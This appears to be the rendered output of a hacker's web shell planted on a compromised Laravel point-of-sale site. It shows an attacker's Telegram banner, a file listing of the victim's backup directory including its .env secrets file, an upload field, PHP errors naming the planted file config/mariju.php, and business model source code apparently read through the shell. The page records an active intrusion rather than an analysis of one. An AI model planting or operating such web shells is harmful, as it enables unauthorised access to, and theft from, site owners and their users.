telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log10446596 KBJuly 18 2025 08:08:320644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
'array', ]; /** * Return list of locations for a business * * @param int $business_id * @param bool $show_all = false * @param array $receipt_printer_type_attribute = * @return array */ public static function forDropdown($business_id, $show_all = false, $receipt_printer_type_attribute = false, $append_id = true, $check_permission = true) { $query = BusinessLocation::where('business_id', $business_id)->Active(); if ($check_permission) { $permitted_locations = auth()->user()->permitted_locations(); if ($permitted_locations != 'all') { $query->whereIn('id', $permitted_locations); } } if ($append_id) { $query->select( DB::raw("IF(location_id IS NULL OR location_id='', name, CONCAT(name, ' (', location_id, ')')) AS name"), 'id', 'receipt_printer_type', 'selling_price_group_id', 'default_payment_accounts', 'invoice_scheme_id', 'invoice_layout_id', 'sale_invoice_scheme_id' ); } $result = $query->get(); $locations = $result->pluck('name', 'id'); $price_groups = SellingPriceGroup::forDropdown($business_id); if ($show_all) { $locations->prepend(__('report.all_locations'), ''); } if ($receipt_printer_type_attribute) { $attributes = collect($result)->mapWithKeys(function ($item) use ($price_groups) { $default_payment_accounts = json_decode($item->default_payment_accounts, true); $default_payment_accounts['advance'] = [ 'is_enabled' => 1, 'account' => null, ]; return [$item->id => [ 'data-receipt_printer_type' => $item->receipt_printer_type, 'data-default_price_group' => ! empty($item->selling_price_group_id) && array_key_exists($item->selling_price_group_id, $price_groups) ? $item->selling_price_group_id : null, 'data-default_payment_accounts' => json_encode($default_payment_accounts), 'data-default_sale_invoice_scheme_id' => $item->sale_invoice_scheme_id, 'data-default_invoice_scheme_id' => $item->invoice_scheme_id, 'data-default_invoice_layout_id' => $item->invoice_layout_id, ], ]; })->all(); return ['locations' => $locations, 'attributes' => $attributes]; } else { return $locations; } } public function price_group() { return $this->belongsTo(\App\SellingPriceGroup::class, 'selling_price_group_id'); } /** * Scope a query to only include active location. * * @param \Illuminate\Database\Eloquent\Builder $query * @return \Illuminate\Database\Eloquent\Builder */ public function scopeActive($query) { return $query->where('is_active', 1); } /** * Get the featured products. * * @return array/object */ public function getFeaturedProducts($is_array = false, $check_location = true) { if (empty($this->featured_products)) { return []; } $query = Variation::whereIn('variations.id', $this->featured_products) ->join('product_locations as pl', 'pl.product_id', '=', 'variations.product_id') ->join('products as p', 'p.id', '=', 'variations.product_id') ->where('p.not_for_selling', 0) ->with(['product_variation', 'product', 'media']) ->select('variations.*'); if ($check_location) { $query->where('pl.location_id', $this->id); } $featured_products = $query->get(); if ($is_array) { $array = []; foreach ($featured_products as $featured_product) { $array[$featured_product->id] = $featured_product->full_name; } return $array; } return $featured_products; } public function getLocationAddressAttribute() { $location = $this; $address_line_1 = []; if (! empty($location->landmark)) { $address_line_1[] = $location->landmark; } if (! empty($location->city)) { $address_line_1[] = $location->city; } if (! empty($location->state)) { $address_line_1[] = $location->state; } if (! empty($location->zip_code)) { $address_line_1[] = $location->zip_code; } $address = implode(', ', $address_line_1); $address_line_2 = []; if (! empty($location->country)) { $address_line_2[] = $location->country; } $address .= '
'; $address .= implode(', ', $address_line_2); return $address; } }